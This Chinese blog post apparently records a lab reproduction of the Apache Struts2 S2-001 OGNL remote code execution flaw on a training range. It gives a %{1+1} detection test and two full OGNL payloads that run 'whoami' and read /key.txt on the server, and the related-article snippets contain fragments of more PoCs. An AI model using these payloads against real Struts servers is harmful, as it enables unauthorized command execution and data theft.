Apache Struts2远程代码执行漏洞(S2-001)复现总结

最新推荐文章于 2024-04-03 14:43:37 发布
最新推荐文章于 2024-04-03 14:43:37 发布
阅读量2k 收藏 4
点赞数
分类专栏: struts2漏洞复现 文章标签: 安全漏洞 struts2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45746681/article/details/108943876
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

前言

为了加深对struts漏洞的理解,记录下复现struts漏洞的过程.

一、Struts2远程代码执行漏洞(S2-001)复现

在这里使用墨者学院的靶场进行复现

检验方法

在这里插入图片描述

在表格中输入%{1+1}看返回结果是否为2
在这里插入图片描述
返回结果都为2,证明账户和密码表格处都存在这个漏洞

利用漏洞进行命令执行

输入以下代码进行命令执行

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

在这里插入图片描述
显示结果成功执行命令
接下来执行命令cat /key.txt获取key值,提交墨者学院
payload为

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/key.txt"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

在这里插入图片描述
在这里插入图片描述

qq_45746681
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Struts2远程代码执行漏洞(S2-001)复现
qq_36933272的博客
09-01 828
根据参考链接,密码框输入%(1+1)验证是否存在S-2001漏洞,用户名任意 回显2,存在漏洞,网上寻找poc,ls查看根目录下的文件,发现key.txt%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{“ls”,"/"})).redirectErrorStream(true).start(), #b=#a.getInputStr...
Apache Struts2远程代码执行漏洞(S2-029)复现
qq_36933272的博客
09-03 1564
打开源代码,发现传递信息的参数是message 查找S-2-029的poc,(#_memberAccess[‘allowPrivateAccess’]=true,#_memberAccess[‘allowProtectedAccess’]=true,#_memberAccess[‘excludedPackageNamePatterns’]=#_memberAccess[‘acceptPropert...
Struts2 远程代码执行漏洞S2-001分析
st3pby的博客
01-05 832
首先来了解 OGNL 表达式,OGNL(Object Graphic Navigatino Language)的中文全称为“对象图导航语言”,是应用于Java中的一个开源的功能强大的表达式语言(Expression Language),它被集成在Struts2等框架中,通过简单一致的表达式语法,可以存取对象的任何属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。OGNL进行对象存取操作的API在Ognl.java文件中,分别是getValue、setValue两个方法。
Apache Struts2远程代码执行漏洞(S2-001)
weixin_47493074的博客
09-29 618
Apache Struts2远程代码执行漏洞(S2-001)
S2-001漏洞分析
灰蜗牛
02-23 1187
Struts2是流行和成熟的基于MVC设计模式的Web应用程序框架。S2-001漏洞是由于 Struts 2 框架处理 HTTP 请求中某些参数的方式存在缺陷。具体来说,该框架无法正确验证这些参数中的用户输入,从而允许攻击者将恶意负载注入应用程序。有效负载可以包含应用程序处理请求时在服务器上执行的任意代码
Struts2 远程代码执行漏洞复现S2-001
Welcome To Myon'Blog !
03-14 1114
Struts2 是一个基于 MVC 设计模式的 Web 应用框架,作为控制器来建立模型与视图的数据交互。此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
Apache Struts2是一款非常流行的Java Web开发框架,它为开发者提供了构建MVC(Model-View-Controller)架构的便捷工具。然而,就像任何其他复杂的软件系统一样,Struts2也存在安全漏洞。其中,S2-045 和 CVE-2017-...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者执行恶意代码,从而危害到网站的安全。 S2-016 漏洞是由于 Struts2 的 Ognl 表达式语言解析器存在缺陷,从而导致攻击者...
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
struts-2.5.16-源码+示例(S2-057漏洞演示环境)
08-24
Struts 2是Apache软件基金会开发的一个开源MVC框架,广泛应用于Java Web应用程序的开发。在版本2.5.16中,存在一个名为S2-057的安全漏洞,这是一个非常重要的安全问题,需要开发者和系统管理员密切关注。这个漏洞...
struts2漏洞
热门推荐
qq_52527336的博客
06-30 1万+
记一下笔记一个个写吧
墨者Apache Struts2远程代码执行漏洞(S2-001)题解
zr1213159840的博客
01-07 441
这题明确说了是什么漏洞,咱们在网上找利用即可,并且参考链接中也提供了相应的信息 官方这个说明说,在表单中填入%{1+1}如果回显为2的话,说明存在这种漏洞,最后我们测试发现,在密码中输入这个式子会回显为2,说明存在这个漏洞,其中的账号随便输 接着拿下面这个exp直接获取key %{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{“cat”,"/key.txt"})).redirectErrorStream(true).start(),
Apache Struts2远程代码执行漏洞(S2-001)复现,腾讯网络安全开发面试
最新发布
2301_79655589的博客
04-03 989
… welcome.jsp … 登录成功 , …web.xml文件部分配置如下所示,这是一种J2EE配置文件,决定se
0x1F. Apache Struts2远程代码执行漏洞(S2-001)复现
qq_31679787的博客
10-16 312
s2-001:WebWork 2.1+和Struts 2的“ altSyntax”功能允许将OGNL表达式插入文本字符串并进行递归处理。这允许恶意用户通常通过HTML文本字段提交包含OGNL表达式的字符串,如果表单验证失败,该字符串将由服务器执行; 通过账号处输入%{1+2}提交后得到返回值 3可判断出s2-001漏洞; 通过构造poc得到查看根目录,发现key文件; poc: %...
s2-001远程代码执行漏洞
Stephen Wolf
11-13 1405
一、漏洞描述: 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。 影响版本: ...
apache struts2框架命令执行漏洞(s2-045、s2-046)
01-11
Apache Struts2框架是一种流行的开源Web应用程序开发框架,但曾经发生过多个命令执行漏洞,其中包括s2-045和s2-046漏洞s2-045漏洞源于在处理远程表达式语言(OGNL)时存在安全漏洞,攻击者可以利用构造特定的HTTP请求发送恶意代码,导致服务器执行该恶意代码,从而获取系统权限。 而s2-046漏洞则是由于Struts2框架中对传入参数的处理不当,攻击者可以通过构造特定的HTTP请求,触发服务器执行恶意代码。 这两个漏洞都存在严重的安全风险,可能导致服务器受到攻击,甚至导致系统被入侵。为了防范这些漏洞,用户应该及时更新Struts2框架的最新版本,开发人员也需要对传入的参数进行严格的验证和过滤,避免恶意代码执行。此外,安全团队也应该定期对服务器进行安全漏洞扫描和修复,以确保系统的安全性。 总之,对于Apache Struts2框架的命令执行漏洞,我们需要重视并采取有效的措施来防范和修复,以确保系统的安全性和稳定性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值